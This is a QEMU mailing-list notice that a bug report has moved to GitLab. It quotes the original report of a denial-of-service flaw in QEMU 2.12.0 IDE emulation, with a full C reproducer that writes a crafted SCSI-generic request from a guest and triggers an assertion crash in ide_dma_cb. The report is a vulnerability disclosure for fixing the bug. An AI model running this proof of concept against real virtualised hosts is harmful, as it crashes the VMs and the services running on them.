
[Bug 1777315] Re: IDE short PRDT abort


From: Thomas Huth
Subject: [Bug 1777315] Re: IDE short PRDT abort
Date: Fri, 30 Apr 2021 16:57:15 -0000

This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:

 https://gitlab.com/qemu-project/qemu/-/issues/57


** Changed in: qemu
       Status: In Progress => Expired

** Changed in: qemu
     Assignee: John Snow (jnsnow) => (unassigned)

** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57
   https://gitlab.com/qemu-project/qemu/-/issues/57

-- 
You received this bug notification because you are a member of qemu-devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315

Title:
  IDE short PRDT abort

Status in QEMU:
  Expired

Bug description:
  Hi,
  QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version 
qemu-2.12.0

  Run the following program in qemu-2.12.0:
  #define _GNU_SOURCE 
  #include <endian.h>
  #include <sys/syscall.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <string.h>
  #include <sys/stat.h>
  #include <stdint.h>
  #include <string.h>

   /*
    * Open a device node, syzkaller-style (the syz_ prefix suggests this is a
    * generated reproducer helper).  Two modes, selected by a0:
    *  - a0 == 0xc (char) or 0xb (block): open /dev/char/MAJ:MIN or
    *    /dev/block/MAJ:MIN, built from the low byte of a1 and a2, with O_RDWR.
    *  - otherwise a0 is a pointer to a path template; every '#' is replaced
    *    by one decimal digit of a1 (least significant digit first) and the
    *    result is opened with a2 passed through as the open(2) flags.
    * Returns the open(2) result widened to uintptr_t: a non-negative fd, or
    * (uintptr_t)-1 on failure.  The caller converts it back to long and
    * compares against -1, which round-trips on the usual two's-complement ABI.
    */
   static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
   {
           if (a0 == 0xc || a0 == 0xb) {
                   char buf[128];
                   /* both numbers are truncated to uint8_t first, so the longest
                    * result is "/dev/block/255:255" (18 chars + NUL): buf is ample */
                   sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
                   return open(buf, O_RDWR, 0);
           } else {
                   char buf[1024];
                   char* hash;
                   /* strncpy may leave buf unterminated; the next line guarantees
                    * a terminator regardless of the template's length */
                   strncpy(buf, (char*)a0, sizeof(buf) - 1);
                   buf[sizeof(buf) - 1] = 0;
                   /* each '#' becomes the next low decimal digit of a1; with
                    * a1 == 0 every '#' simply becomes '0' */
                   while ((hash = strchr(buf, '#'))) {
                           *hash = '0' + (char)(a1 % 10);
                           a1 /= 10;
                   }
                   return open(buf, a2, 0);
           }
   }

   /* Results of the open()/dup2() calls made by loop(): r[0] is the sg fd,
    * r[1] its dup2() result.  Both start as (uint64_t)-1 ("no fd yet") and
    * are only overwritten when the corresponding call succeeds. */
   uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
   /*
    * Guest-side body of the reproducer: open the first SCSI-generic node and
    * submit one raw request to it.  Every absolute address below lies inside
    * the 0x20000000 region that main() maps before calling this function.
    */
   void loop()
   {
           long res = 0;
           /* path template "/dev/sg#" plus its NUL terminator (9 bytes) */
           memcpy((void*)0x20000000, "/dev/sg#", 9);
           /* a1 == 0 turns the '#' into '0', so this opens /dev/sg0; a2 == 2 is
            * passed straight through as the open(2) flags (O_RDWR on Linux) */
           res = syz_open_dev(0x20000000, 0, 2);
           if (res != -1)
                   r[0] = res;
           /* dup2(fd, fd) with equal descriptors is a no-op that returns fd --
            * or fails with EBADF if r[0] is still the -1 sentinel */
           res = syscall(__NR_dup2, r[0], r[0]);
           if (res != -1)
                   r[1] = res;
           /* Build the request at 0x20000ec0.  Only a few fields are stored
            * explicitly; the remaining bytes of the 0x323 sent below are whatever
            * the mapping holds (an anonymous mapping, so zero-filled).
            * NOTE(review): the offsets presumably follow the sg driver's write(2)
            * request-header layout, with the 12 bytes at +0x20 being command
            * bytes; that is not inferable from these stores alone -- confirm
            * against the sg interface before documenting it as fact. */
           *(uint8_t*)0x20000ec0 = 0;                    /* +0x00..+0x03 */
           *(uint8_t*)0x20000ec1 = 0;
           *(uint8_t*)0x20000ec2 = 0;
           *(uint8_t*)0x20000ec3 = 0;
           *(uint32_t*)0x20000ec8 = 0;                   /* +0x08, 4 bytes */
           *(uint8_t*)0x20000ed8 = 0;                    /* +0x18..+0x1b */
           *(uint8_t*)0x20000ed9 = 0;
           *(uint8_t*)0x20000eda = 0;
           *(uint8_t*)0x20000edb = 0;
           memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12); /* +0x20 */
           /* write(2) on a /dev/sg node hands the buffer to the SCSI-generic
            * driver as a request.  Per the report above, this single guest
            * action is what reaches QEMU's ide_dma_cb and trips its
            * `n * 512 == s->sg.size' assertion.  The return value is ignored,
            * so a failed open (r[1] still -1 -> EBADF) goes unnoticed. */
           syscall(__NR_write, r[1], 0x20000ec0, 0x323);
   }

   /*
    * Entry point: map the fixed scratch region the reproducer writes into,
    * then run the single iteration in loop().
    * mmap(0x20000000, 16 MiB, prot 3, flags 0x32, fd -1, off 0): on x86-64
    * Linux prot 3 is PROT_READ|PROT_WRITE and 0x32 is
    * MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, so the region is zero-filled and
    * pinned at that address.  The result is not checked; had the mapping
    * failed, the raw stores in loop() would fault instead.
    * Style note: `int main()` is an old-style declaration; `int main(void)`
    * is the prototype form.
    */
   int main()
   {
           syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
           loop();
           return 0;
   }
  This will crash QEMU; the output is:
   qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.

  
  Thanks 
  owl337

To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions


